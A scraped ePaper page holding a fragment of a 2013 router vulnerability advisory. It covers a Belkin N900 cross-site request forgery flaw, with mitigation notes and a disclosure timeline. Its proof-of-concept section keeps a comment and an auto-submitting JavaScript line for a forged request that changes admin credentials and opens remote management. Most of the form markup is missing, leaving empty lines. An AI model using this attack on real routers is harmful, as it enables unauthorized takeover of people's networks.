20.06.2015 Views

ISE SOHO Vulnerability Catalog Published - Independent Security ...

ISE SOHO Vulnerability Catalog Published - Independent Security ...

ISE SOHO Vulnerability Catalog Published - Independent Security ...

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors<br />

Solution<br />

♦ There currently is not a solution to this problem.<br />

♦ Restrict access to WAN services such as remote management to prevent an<br />

attacker from gaining access if an attack is successful.<br />

Proof of Concept Exploit<br />

If the following request is sent to the router, it will change the configuration settings<br />

without authentication.<br />

/*Change Password and Enable Remote Management on Port 31337*/<br />

<br />

<br />

Belkin N900 CSRF -­‐ Change Admin Creds. and Enable Remote MGMT. <br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

function BeLkIn() {document.belkinN900.submit();}; window.setTimeout(BeLkIn, 0000); <br />

<br />

<br />

<br />

Disclosure Timeline<br />

♦ 2/11/2013 - Notified Belkin<br />

♦ 4/15/2013 - Public Disclosure<br />

<br />

67

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!